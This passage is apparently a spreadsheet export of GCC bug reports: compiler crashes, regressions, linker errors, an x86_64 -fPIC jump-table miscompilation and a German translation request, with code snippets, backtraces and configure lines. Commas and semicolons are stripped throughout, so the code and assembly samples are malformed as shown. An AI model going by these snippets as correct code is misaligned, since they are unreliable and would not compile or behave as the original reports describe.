configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
How-To-Repeat:
Source code t.C
#ifndef BOOST_CONCEPT_CHECKS_HPP
#define BOOST_CONCEPT_CHECKS_HPP
//#     include 
#include 
#include 
#include 
namespace std
{
template 
inline void __distance(_InputIterator __first _InputIterator __last
                       _Distance&amp; __n input_iterator_tag)
{
  // concept requirements
  glibcpp_function_requires(InputIteratorConcept)
  while (__first != __last) { ++__first ++__n }
}
} // namespace std
#endif
Compiling t.C</t>
  </si>
  <si>
    <t>GCC-5492</t>
  </si>
  <si>
    <t>basic_string seems to fail to use template-defined allocator.</t>
  </si>
  <si>
    <t>I am using a persistent object storage library to allocate memory using mmap().
Using this process I can define allocators for all STL objects.  I defined
a new typedef (pstring) which is identical to string except that it uses
the new allocator.  This completely works with STLPort.  It compiles completely
with gcc 3.0.3 but when the program is stopped and re-started (re-loading the
data from the storage file I get a valid basic_string object but the data
within it is not valid.
Release:
3.0.3
Environment:
System: Linux fenix 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure
How-To-Repeat:
You should be able to reproduce this error by using any allocator other than
default and the tracking which one is used (my inclination is that
basic_string's data is being allocated by the default allocator regardless
of any allocator passed as a template parameter)
I reproduced this problem by using the POST++ library with a 
modified post_stl.h.
POST++'s site is available at http://www.ispras.ru/~knizhnik/post.html
I contacted Konstantin Kriznik the author of this library and he too was
unable to get it to work with gcc 3.0.3.  If for some reason you need a copy
of the post_stl.h I was using I am available at kk71878@hotmail.com</t>
  </si>
  <si>
    <t>kk71878</t>
  </si>
  <si>
    <t>GCC-83097</t>
  </si>
  <si>
    <t>Use __BYTE_ORDER__ instead of runtime test</t>
  </si>
  <si>
    <t>We could use the __BYTE_ORDER__ macro for replacing the
big_endian global variable in libgfortran and for
improving (and inlining) memcmp_char4 for little-endian
systems.</t>
  </si>
  <si>
    <t>GCC-51227</t>
  </si>
  <si>
    <t>[c++0x] ICE with invalid parameter in lambda expression</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE when compiled with -std=c++0x since the introduction of lambda expressions (GCC 4.5.0):
====================================
template int foo()
{
  [] (void i) { return 0 } (0)
}
void bar()
{
  foo()
}
====================================
bug.cc: In function 'int foo()':
bug.cc:3:12: error: 'i' has incomplete type
bug.cc:3:13: error: invalid use of 'void'
bug.cc: In instantiation of 'struct foo() [with int  = 0]::':
bug.cc:3:3:   required from 'int foo() [with int  = 0]'
bug.cc:8:10:   required from here
bug.cc:3:4: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-1456</t>
  </si>
  <si>
    <t>wait(timeout) always throws exception</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Known bug in libgcj 2.95.x. Already fixed in cvs and snapshot releases.
</t>
  </si>
  <si>
    <t>GCC-21056</t>
  </si>
  <si>
    <t>Linker errors when deriving from std::iostream</t>
  </si>
  <si>
    <t>The following simple program doesn't link:
----- Derived.h -----
#ifndef Derived_hh
#define Derived_hh
#include 
#include 
class D : public std::iostream
{
public:
    ~D() 
} 
#endif
----- Derived.cc -----
#include Derived.hh
D::~D()
{
}
----- main.cc -----
#include Derived.hh
int
main()
{
    D d 
    return 0 
}
----- -----
The compiler command was simply g++ main.cc Derived.cc.
Output was:
----- compiler output -----
/home/kanze/tmp/ccJrgTHi.o(.gnu.linkonce.t._ZN1DC1Ev+0x29): In function `D::D()':
: undefined reference to `std::basic_iostream
&gt;::basic_iostream()'
/home/kanze/tmp/cctV9drU.o(.text+0x149): In function `D::~D()':
: undefined reference to `std::basic_iostream
&gt;::~basic_iostream()'
/home/kanze/tmp/cctV9drU.o(.text+0x1fa): In function `D::~D()':
: undefined reference to `std::basic_iostream
&gt;::~basic_iostream()'
/home/kanze/tmp/cctV9drU.o(.text+0x2ac): In function `D::~D()':
: undefined reference to `std::basic_iostream
&gt;::~basic_iostream()'
/home/kanze/tmp/cctV9drU.o(.gnu.linkonce.r._ZTC1D0_Sd+0xc): undefined reference
to `std::basic_iostream &gt;::~basic_iostream()'
/home/kanze/tmp/cctV9drU.o(.gnu.linkonce.r._ZTC1D0_Sd+0x10): undefined reference
to `std::basic_iostream &gt;::~basic_iostream()'
collect2: ld returned 1 exit status
----- -----
I'm not an expert in your template instantiation strategy but
when I compile Derived.cc separately then use nm on the object
file I find unresolved externals for symbols like std::iostream::~iostream
(which shouldn't exist except as a typedef to a template instantiation
I think).  From what little I understand I would have expected a
weak definition for the template instantiation (the missing function
in the messages above).
The relevant options I used when building the compiler were:
    --enable-threads --enable-__cxa_atexit --disable-nls
(I don't think they have anything to do with the problem but one
never knows.)
--
James Kanze</t>
  </si>
  <si>
    <t>GCC-53874</t>
  </si>
  <si>
    <t>-Wswitch-enum not properly working with bitfields</t>
  </si>
  <si>
    <t>typedef enum
{
    A
    B
    C
} tEnum
typedef struct t_A
{
 tEnum         my_enum:4
} tA
int test(tA * bla)
{
 switch(bla-&gt;my_enum)
 {
     default:
         return 0
 }
}
I expect the compiler to complain:
test-enum.c:23: warning: enumeration value `A' not handled in switch
test-enum.c:23: warning: enumeration value `B' not handled in switch
test-enum.c:23: warning: enumeration value `C' not handled in switch
I verified this works in GCC 3.4 but not in GCC 4.6.
Thanks</t>
  </si>
  <si>
    <t>GCC-5316</t>
  </si>
  <si>
    <t>compliation problem</t>
  </si>
  <si>
    <t>The follwoing codes has compilation problem on 3.0.3
#include 
#include 
class commsbuf : public filebuf
{
        public:
             void   f1() {
                        int pb = blen()
                        char *b = base()
                        int fd1 = fd()
                        int y = unbuffered()
                        int z = out_waiting()
                }
}
main()
{
}
which is ok on other C++ compiler and good on 2.9166
 (RedHat 6.2).
Release:
3.0.3
Environment:
RedHat 7.1</t>
  </si>
  <si>
    <t>GCC-486</t>
  </si>
  <si>
    <t>nested class forward declaration not recognized</t>
  </si>
  <si>
    <t>Simultaneously forward declaring a nested class and a
pointer to the class doesn't work because the compiler
sees the nested class as being in the global scope.
Release:
Reading specs from /uns/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs gcc version 2.95.2 19991024 (release)
How-To-Repeat:
This doesn't compile
-----------------------------------------------------
struct A
{
//    struct B
    struct B *b
}
struct A::B
{
    int x
}
-----------------------------------------------------
But it will if the 3rd line is uncommented.</t>
  </si>
  <si>
    <t>GCC-34674</t>
  </si>
  <si>
    <t>Assert_Failure sinfo.adb:2141</t>
  </si>
  <si>
    <t>cc -c -fPIC -I- -gnatA abjects.adb
+===========================GNAT BUG DETECTED==============================+
| 4.3.0 20071005 (experimental) (i686-pc-linux-gnu) Assert_Failure sinfo.adb:2141|
| Error detected at factorys-objects.ads:115:4</t>
  </si>
  <si>
    <t>andry.ogorodnik</t>
  </si>
  <si>
    <t>GCC-25416</t>
  </si>
  <si>
    <t>Segmentation fault in gfc_conv_function_call</t>
  </si>
  <si>
    <t>The following test case
function bug(selfstrvec) result(res)
  character(*) :: self
  character(*) dimension(:) intent(in) :: strvec
  logical(kind=kind(.true.)) :: res
  res = any(index(strvecspread(self1size(strvec))) /= 0)
end function
triggers this ICE
#0  0x0000000080070008 in gfc_conv_function_call (se=0x3ffffffdfc0 sym=0x8059e770 arg=0x8059d850)
    at ../../gcc-4_1/gcc/fortran/trans-expr.c:1542
#1  0x0000000080074256 in gfc_conv_intrinsic_funcall (se=0x3ffffffdfc0 expr=0x8059e040)
    at ../../gcc-4_1/gcc/fortran/trans-intrinsic.c:1257
#2  0x0000000080077220 in gfc_conv_intrinsic_function (se=0x3ffffffdfc0 expr=0x8059e040)
    at ../../gcc-4_1/gcc/fortran/trans-intrinsic.c:3256
#3  0x0000000080070576 in gfc_conv_function_expr (se=0x3ffffffdfc0 expr=0x8059d850) at ../../gcc-4_1/gcc/fortran/trans-expr.c:1951
#4  0x00000000800709e0 in gfc_conv_expr (se=0x3ffffffdfc0 expr=0x8059e040) at ../../gcc-4_1/gcc/fortran/trans-expr.c:2314
#5  0x0000000080066e5e in gfc_add_loop_ss_code (loop=0x3ffffffe1d0 ss=0x8059e470 subscript=0 '\0')
    at ../../gcc-4_1/gcc/fortran/trans-array.c:1480
#6  0x0000000080067346 in gfc_conv_loop_setup (loop=0x3ffffffe1d0) at ../../gcc-4_1/gcc/fortran/trans-array.c:2732
#7  0x00000000800743a2 in gfc_conv_intrinsic_anyall (se=0x3fffffff290 expr=0x80572730 op=101)
    at ../../gcc-4_1/gcc/fortran/trans-intrinsic.c:1323
#8  0x00000000800779e4 in gfc_conv_intrinsic_function (se=0x3fffffff290 expr=0x8059d3a0)
    at ../../gcc-4_1/gcc/fortran/trans-intrinsic.c:2991
#9  0x0000000080070576 in gfc_conv_function_expr (se=0x3fffffff290 expr=0x8059d850) at ../../gcc-4_1/gcc/fortran/trans-expr.c:1951
#10 0x00000000800709e0 in gfc_conv_expr (se=0x3fffffff290 expr=0x8059d3a0) at ../../gcc-4_1/gcc/fortran/trans-expr.c:2314
#11 0x0000000080072c86 in gfc_trans_assignment (expr1=0x8059d220 expr2=0x8059d3a0) at ../../gcc-4_1/gcc/fortran/trans-expr.c:2751
#12 0x00000000800730c8 in gfc_trans_assign (code=0x0) at ../../gcc-4_1/gcc/fortran/trans-expr.c:2813
#13 0x0000000080060a68 in gfc_trans_code (code=0x8059cb50) at ../../gcc-4_1/gcc/fortran/trans.c:493
#14 0x000000008006def8 in gfc_generate_function_code (ns=0x805654d0) at ../../gcc-4_1/gcc/fortran/trans-decl.c:2639
#15 0x0000000080060b60 in gfc_generate_code (ns=0x0) at ../../gcc-4_1/gcc/fortran/trans.c:659
#16 0x0000000080042bd0 in gfc_parse_file () at ../../gcc-4_1/gcc/fortran/parse.c:2680
#17 0x000000008005c0d0 in gfc_be_parse_file (set_yydebug=0) at ../../gcc-4_1/gcc/fortran/f95-lang.c:286
#18 0x00000000802648d0 in toplev_main (argc=7 argv=0x8055e6a0) at ../../gcc-4_1/gcc/toplev.c:990
#19 0x0000000080083fcc in main (argc=0 argv=0x0) at ../../gcc-4_1/gcc/main.c:35
in the line
1542      need_interface_mapping = ((sym-&gt;ts.type == BT_CHARACTER
1543                                 &amp;&amp; sym-&gt;ts.cl-&gt;length-&gt;expr_type != EXPR_CONSTANT)
1544                                || sym-&gt;attr.dimension)
because sym-&gt;ts.cl-&gt;length is NULL.
(gdb) print *sym
$1 = {name = 0x8059ba7c _gfortran_spread_char_scalar module = 0x0 declared_at = {nextc = 0x80578268  lb = 0x80578240}
  ts = {type = BT_CHARACTER kind = 1 derived = 0x0 cl = 0x80572730} attr = {allocatable = 0 dimension = 1 external = 1
    intrinsic = 0 optional = 0 pointer = 0 save = 0 target = 0 dummy = 0 result = 0 assign = 0 data = 0 use_assoc = 0
    in_namelist = 0 in_common = 0 in_equivalence = 0 function = 1 subroutine = 0 generic = 0 implicit_type = 0 untyped = 0
    sequence = 0 elemental = 0 pure = 0 recursive = 0 unmaskable = 0 masked = 0 contained = 0 noreturn = 0 entry = 0
    entry_master = 0 mixed_entry_master = 0 always_explicit = 1 referenced = 0 is_main_program = 0 access = ACCESS_UNKNOWN
    intent = INTENT_UNKNOWN flavor = FL_PROCEDURE if_source = IFSRC_UNKNOWN proc = PROC_INTRINSIC cray_pointer = 0
    cray_pointee = 0} generic = 0x0 component_access = ACCESS_UNKNOWN formal = 0x0 formal_ns = 0x0 value = 0x0
  as = 0x8059e8a0 result = 0x8059e770 components = 0x0 cp_pointer = 0x0 common_next = 0x0 common_head = 0x0 dummy_order = 0
  namelist = 0x0 namelist_tail = 0x0 old_symbol = 0x0 tlink = 0x0 mark = 0 new = 0 equiv_built = 0 refs = 0 ns = 0x0
  backend_decl = 0x0}
(gdb) print *sym-&gt;ts.cl
$2 = {length = 0x0 next = 0x0 backend_decl = 0x200001f8460}</t>
  </si>
  <si>
    <t>GCC-43704</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: tree check: accessed elt 2 of tree_vec with 1 elts in tsubst at cp/pt.c:10074</t>
  </si>
  <si>
    <t>&gt; g++-4.5 -S bug-593923_integrals.3.ii
bug-593923_integrals.3.ii: In instantiation of 'boost::numeric::ublas::banded_adaptor &gt;::iterator1':
bug-593923_integrals.3.ii:500:50:   instantiated from 'void lsp::singular_decomposition::apply(M1&amp; M2&amp;) const [with M1 = boost::numeric::ublas::matrix M2 = boost::numeric::ublas::matrix T = boost::numeric::ublas::matrix]'
bug-593923_integrals.3.ii:555:27:   instantiated from here
bug-593923_integrals.3.ii:467:17: internal compiler error: tree check: accessed elt 2 of tree_vec with 1 elts in tsubst at cp/pt.c:10074
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-21259</t>
  </si>
  <si>
    <t>ICE on assigning the pointer to a array with __attribute__ aligned</t>
  </si>
  <si>
    <t>Compiler gets a segfault if the following code is tried on gcc 3.4.3
the same works fine on gcc4.0 and mainline
static void foo ( int arg){
  unsigned long long int __attribute__ ((aligned (4))) aligned_array[arg]
  unsigned long long int *bak = aligned_array
}</t>
  </si>
  <si>
    <t>GCC-58254</t>
  </si>
  <si>
    <t>ICE when using PGO</t>
  </si>
  <si>
    <t>Created attachment 30707
preprocessed testcase source file
Error message:
main.cpp: In destructor â€˜std::_Function_base::~_Function_base()â€™:
main.cpp:207:1: internal compiler error: NeoprÃ¡vnÄ›nÃ½ pÅ™Ã­stup do pamÄ›ti (SIGSEGV)
GCC version:
Using built-in specs.
COLLECT_GCC=g++-4.8.1
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.8.1/configure --program-suffix=-4.8.1
Thread model: posix
gcc version 4.8.1 (GCC) 
Cammands that trigger the bug:
g++-4.8.1 -std=c++11 -fprofile-generate -o test main.ii
./test
g++-4.8.1 -std=c++11 -fprofile-use -o test main.ii 
Additional info:
There was no error when compiling without PGO and there was no error when compiling (with PGO) using gcc 4.7.2.
Code overview:
Preprecessed and reduce C++ source file is attached. It originally looked like this:
#include 
void g(std::function f)
{}
int main(){
    g([] {} )
}</t>
  </si>
  <si>
    <t>hrebejkt</t>
  </si>
  <si>
    <t>GCC-36075</t>
  </si>
  <si>
    <t>[4.3.1 Regression] FAIL: gcc.c-torture/execute/20021119-1.c execution  -O2</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/gcc/xgcc -B/mnt/gnu/gcc/objdir/gcc/ /mnt/
gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20021119-1.c  -w  -O2  -fno-show
-column  -lm   -o /mnt/gnu/gcc/objdir/gcc/testsuite/gcc/20021119-1.x2    (timeou
t = 300)
PASS: gcc.c-torture/execute/20021119-1.c compilation  -O2 
Setting LD_LIBRARY_PATH to :/mnt/gnu/gcc/objdir/gcc::/mnt/gnu/gcc/objdir/gcc
FAIL: gcc.c-torture/execute/20021119-1.c execution  -O2 
Revision 134604 was ok.
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.3.1 --with-gmp=/opt/gnu/gcc/gcc-4.3.1 --enable-threads=posix --enable-debug=no --disable-nls --enable-languages=cc++objcfortranjavaadaobj-c++
Thread model: posix
gcc version 4.3.1 20080427 (prerelease) [gcc-4_3-branch revision 134730] (GCC)</t>
  </si>
  <si>
    <t>GCC-32109</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE with inline-asm and class with destructor</t>
  </si>
  <si>
    <t>The following (valid?) code snippet triggers an ICE since GCC 3.1:
=================================
struct A
{
  ~A()
}
struct B
{
  A a
  B()
}
B::B()
{
  asm( : : r(a) )
}
=================================
bug.cc: In constructor 'B::B()':
bug.cc:14: internal compiler error: in create_tmp_var at gimplify.c:489
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-36237</t>
  </si>
  <si>
    <t>internal compiler error: in lower_stmt at gimple-low.c:282 erase 'private(localTodoStack)' it compiles successfully.</t>
  </si>
  <si>
    <t>* the exact version of GCC
* the system type
* the options given when GCC was configured/built
The output of g++ -v is:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)
* the complete command line that triggers the bug
The command is simply `make' wich will turn into:
    g++ -Wall -O0 -fopenmp qsort_openmp_v2.cpp utils.o -o qsort_openmp_v2
* the compiler output (error messages warnings etc.) and
qsort_openmp_v2.cpp: In function â€˜int main(int char**)â€™:
qsort_openmp_v2.cpp:0: internal compiler error: in lower_stmt at gimple-low.c:282
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
make: *** [qsort_openmp_v2] Error 1
* the preprocessed file (*.i*) that triggers the bug generated by adding -save-temps to the complete compilation command or in the case of a bug report for the GNAT front end a complete set of source files (see below).
I will attach them.</t>
  </si>
  <si>
    <t>silviug</t>
  </si>
  <si>
    <t>GCC-6440</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] template specializations cause ICE</t>
  </si>
  <si>
    <t>See ISO C++ core issue 336.
spec-example-c336.cc:14: Internal compiler error in lookup_template_class at 
   cp/pt.c:3960
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.4 and recent CVS checkout
Environment:
Linux 2.4.17
How-To-Repeat:
    template struct A { 
        template struct B { 
            template void mf1(T3)
            void mf2() 
        } 
    } 
    template template 
        struct A::B {
            template void mf1(T)
    } 
    template template template 
        void A::B::mf1(T t) { } 
    template template 
        void A::B::mf2() { }</t>
  </si>
  <si>
    <t>GCC-6912</t>
  </si>
  <si>
    <t>x86_64 switch code generation problem with -fPIC</t>
  </si>
  <si>
    <t xml:space="preserve">	gcc 3.1 and up generates bad code for switch jump tables when
	using the -fPIC flag. The problem is that the generated jump
	table contains 32-bit signed values for the relative offset to
	jump to. This is fine for small mode. However when they are
	loaded into a register for the computation of the jump destination
	they are not sign-extended.
	This means that for negative offsets the computed address will
	be wrong and way out of range (i.e. -10 will be added as
	0x00000000fffffff6).
	This bug may have gone unnoticed for a while because mostly
	the jump table resides in memory *before* the code it points
	to (.rodata comes before .text or the jumptable resides in
	.text before the code) so the offsets will be positive.
	But there are cases in which this is not the case (like in the
	NetBSD dynamic linker). And a compiler should not make assumptions
	about the order of sections anyway.
	small example program:
/*
 * Simple testcode to tickle a codegen bug with -fPIC and switch
 * statements on x86_64.
 *
 * The code inside the cases is irrelevant it's just there as
 * filler to avoid stuff being optimised away.
 */
extern int a b c d e
int
foo(void)
{
	switch (a) {
	case 1:
		a = b * c
		a--
		break
	case 2:
		a = d * e
		c = d / b
		break
	case 3:
		a = c / d
		b = d * d
		c--
		break
	case 4:
		a = d * d
		b = c * c
		break
	case 5:
		c++
		d++
		c = b * b
		break
	}
	return 0
}
======
	gcc 3.1 and up generates (with -O -fPIC)
======
        .file   c.c
        .text
        .align 2
.globl foo
        .type   foo@function
foo:
.LFB1:
        pushq   %rbx
.LCFI0:
        movq    a@GOTPCREL(%rip) %rax
        cmpl    $5 (%rax)
        ja      .L2
        mov     (%rax) %eax
        leaq    .L8(%rip) %rdx
        mov     (%rdx%rax4) %eax		&lt;==== no sign-extension
        addq    %rdx %rax			&lt;====
        jmp     *%rax
        .section        .rodata
        .align 4
        .align 4
.L8:
        .long   .L2-.L8
        .long   .L3-.L8
        .long   .L4-.L8
        .long   .L5-.L8
        .long   .L6-.L8
        .long   .L7-.L8
        .text
.L3:
[... rest of code deleted]
======
	An older gcc (gcc version 3.1 20010430 (experimental))
	generates (with -O -fPIC) correct code:
======
        .file   c.c
        .text
        .align 4
.globl foo
        .type   foo@function
foo:
.LFB1:
        pushq   %rbx
.LCFI0:
        movq    a@GOTPCREL(%RIP) %rax
        movl    (%rax) %eax
        decl    %eax
        cmpl    $4 %eax
        ja      .L2
        mov     %eax %eax
        leaq    .L8(%rip) %rdx
        movslq  (%rdx%rax4)%rax	&lt;=== correct sign extension
        leaq    (%rax%rdx) %rax
        jmp     *%rax
        .section        .rodata
        .align 16
        .align 4
.L8:
        .long .L3-.+4+(.-.L8)
        .long .L4-.+4+(.-.L8)
        .long .L5-.+4+(.-.L8)
        .long .L6-.+4+(.-.L8)
        .long .L7-.+4+(.-.L8)
        .text
        .align 4
.L3:
[... rest of output deleted]
Release:
3.2 20020602 (experimental)
Environment:
System: NetBSD k2 1.5ZC NetBSD 1.5ZC (K2) #0: Wed May 1 02:01:29 CEST 2002 fvdl@k2:/work/trees/empee/sys/arch/i386/compile/K2 i386
host: i386-unknown-netbsdelf1.5ZC
build: i386-unknown-netbsdelf1.5ZC
target: x86_64--netbsd
configured with: /work/trees/toolchain/gcc/configure --target=x86_64--netbsd --disable-shared --with-gnu-ld --with-gas --enable-languages=c c++ --prefix=/work/fvdl/toolchain
How-To-Repeat:
	Compile with a largish switch with -fPIC and link the
	resulting program in such a way that the jumptable comes
	after the code it points to.</t>
  </si>
  <si>
    <t>fvdl</t>
  </si>
  <si>
    <t>GCC-21724</t>
  </si>
  <si>
    <t>[4.0 Regression] libmudflap/Makefile.am refusing to install mf-runtime.h in includedir</t>
  </si>
  <si>
    <t>When doing something like:
  make install includedir=/foo/bar/baz
in gcc 4.0.0 you get the following error:
test -z /include || mkdir -p -- /include
 /usr/bin/install -c -m 644
'/home/ams/gsc/devel/gcc/src/libmudflap/mf-runtime.h' '/include/mf-runtime.h'
/usr/bin/install: cannot create regular file `/include/mf-runtime.h': Permission
denied
make[5]: *** [install-includeHEADERS] Error 1
This applys to any platform not just GNU.
Happy hacking.</t>
  </si>
  <si>
    <t>GCC-83882</t>
  </si>
  <si>
    <t>FAIL: g++.dg/opt/pr81715.C  -std=gnu++98 (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc/objdir/gcc/testsuite/g++/../../xg++ -B/home/dave/gnu/gcc/objdir/gcc/testsuite/g++/../../ /home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/pr81715.C    -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++ -I/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libstdc++-v3/include/hppa-linux-gnu -I/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libstdc++-v3/include -I/home/dave/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/home/dave/gnu/gcc/gcc/libstdc++-v3/include/backward -I/home/dave/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0  -std=gnu++98 -O2 -Wframe-larger-than=16384  -S -o pr81715.s    (timeout = 300)
spawn -ignore SIGHUP /home/dave/gnu/gcc/objdir/gcc/testsuite/g++/../../xg++ -B/home/dave/gnu/gcc/objdir/gcc/testsuite/g++/../../ /home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/pr81715.C -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libstdc++-v3/include/hppa-linux-gnu -I/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libstdc++-v3/include -I/home/dave/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/home/dave/gnu/gcc/gcc/libstdc++-v3/include/backward -I/home/dave/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++98 -O2 -Wframe-larger-than=16384 -S -o pr81715.s
/home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/pr81715.C: In function 'void bar(int int int S int int)':
/home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/pr81715.C:36:1: warning: the frame size of 85740 bytes is larger than 16384 bytes [-Wframe-larger-than=]
FAIL: g++.dg/opt/pr81715.C  -std=gnu++98 (test for excess errors)
Excess errors:
/home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/pr81715.C:36:1: warning: the frame size of 85740 bytes is larger than 16384 bytes [-Wframe-larger-than=]</t>
  </si>
  <si>
    <t>GCC-33688</t>
  </si>
  <si>
    <t>Ada package Gnat.Sockets missing constant for IP_PKTINFO (patch)</t>
  </si>
  <si>
    <t>We are using gcc and Gnat.Sockets and have the need to filter incoming packets according to their origin (device IP port) in order to enable this we have patched gcc to offer the constant IP_PKTINFO.
I am going to attach an archive with the patched files for gcc-snapshot. The addition is quite straightforward and we would be happy if it could make it into 4.3.0 or 4.3.1 mayhaps.</t>
  </si>
  <si>
    <t>kayhayen</t>
  </si>
  <si>
    <t>GCC-26987</t>
  </si>
  <si>
    <t>German translation of gcc 4.1</t>
  </si>
  <si>
    <t>Hi
the gcc and cpplib domains have been completely translated to German for a while. Unfortunately the Translation Project file robot is broken. I'm the usual translator as for the previous gcc versions and you can download the de.po files from
http://antcom.de/i18n/
It would be frustrating doing all the work and not seeing it incorporated into gcc.
Thanks.
bye
  Roland</t>
  </si>
  <si>
    <t>GCC-67477</t>
  </si>
  <si>
    <t>[6 Regression] ICE in cselib_record_set at cselib.c:2388</t>
  </si>
  <si>
    <t>Created attachment 36298
reduced preprocessed source
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: arm-unknown-linux-gnueabi
Configured with: ../configure --target=arm-unknown-linux-gnueabi --prefix=/home/rmansfield/x-tools/arm-unknown-linux-gnueabi --with-sysroot=/home/rmansfield/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi//sys-root --disable-multilib --with-local-prefix=/home/rmansfield/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace target_alias=arm-unknown-linux-gnueabi --enable-languages=c++ --disable-libssp --enable-checking
Thread model: posix
gcc version 6.0.0 20150907 (experimental) [trunk revision 227519] (GCC) 
$ ./xgcc -B. ~/ice.i -O3 -fstack-protector-strong -mfpu=neon -mfloat-abi=softfp  -march=armv7-a -mfloat-abi=softfp -c
/home/rmansfield/ice.i: In function 'swblit_1d_NV12_2_B8G8R8X8':
/home/rmansfield/ice.i:69:1: internal compiler error: in cselib_record_set at cselib.c:2388
 }
 ^
0x6df43f cselib_record_set
	../../gcc/cselib.c:2388
0x6df43f cselib_record_sets
	../../gcc/cselib.c:2605
0x6e0137 cselib_process_insn(rtx_insn*)
	../../gcc/cselib.c:2678
0x99ef08 reload_cse_regs_1
	../../gcc/postreload.c:235
0x99f23b reload_cse_regs
	../../gcc/postreload.c:81
0x99f23b execute
	../../gcc/postreload.c:2350
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Started happening after r227382
https://gcc.gnu.org/viewcvs/gcc?view=revision&amp;revision=227382</t>
  </si>
  <si>
    <t>GCC-55160</t>
  </si>
  <si>
    <t>[4.8 Regression] Counterproductive loop induction variable optimization</t>
  </si>
  <si>
    <t>Starting with rev 192505 the following
int test_04 (int* x int c)
{
  int s = 0
  for (int i = 0 i &lt; c ++i)
    s += *--x
  return s
}
gets compiled to (SH -O2 -m4 -ml):
        cmp/pl  r5
        bf/s    .L12
        mov     #0r1
        mov     #0r0
.L11:
        add     #-4r4
        mov.l   @r4r2
        add     #1r1
        cmp/eq  r5r1
        bf/s    .L11
        add     r2r0
        rts
        nop
.L12:
        rts
        mov     #0r0
whereas before (also on 4.7.3) it was:
        cmp/pl  r5
        bf/s    .L11
        mov     #0r0
.L10:
        add     #-4r4
        mov.l   @r4r1
        dt      r5
        bf/s    .L10
        add     r1r0
        rts	
        nop
.L11:
        rts	
        nop
In this case the inner loop code size effectively does not increase but there is overhead in setting up the loop.  Similar code is also generated on ARM.
Another similar case:
int test_03 (int* x int c)
{
  int s = 0
  for (int i = 0 i &lt; c ++i)
    s += x[i]
  return s
}
rev 192505:
        cmp/pl  r5
        bf/s    .L4
        shll2   r5
        add     r4r5
        mov     #0r0
.L3:
        mov.l   @r4+r1
        cmp/eq  r5r4
        bf/s    .L3
        add     r1r0
        rts
        nop
.L4:
        rts
        mov     #0r0
before it was:
        cmp/pl  r5
        bf/s    .L6
        mov     #0r0
        shll2   r5
        add     #-4r5
        shlr2   r5
        add     #1r5
.L3:
        mov.l   @r4+r1
        dt      r5
        bf/s    .L3
        add     r1r0
.L6:
        rts	
        nop
In this case there was the useless loop setup code.  Ideally this should be something like:
        cmp/pl  r5
        bf/s    .L6
        mov     #0r0
.L3:
        mov.l   @r4+r1
        dt      r5
        bf/s    .L3
        add     r1r0
.L6:
        rts	
        nop
JÃ¶rn I've added you in CC because your commit (rev 192505) seems to have triggered something there.  I'm not sure whether this is actually the cause for this counter productive transformation.</t>
  </si>
  <si>
    <t>GCC-42922</t>
  </si>
  <si>
    <t>Wrongly rejected derived types with default initializers in PURE procedures 2</t>
  </si>
  <si>
    <t>This is a problem very similar to this one:
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=42008
gfortran rejects the attached code because:
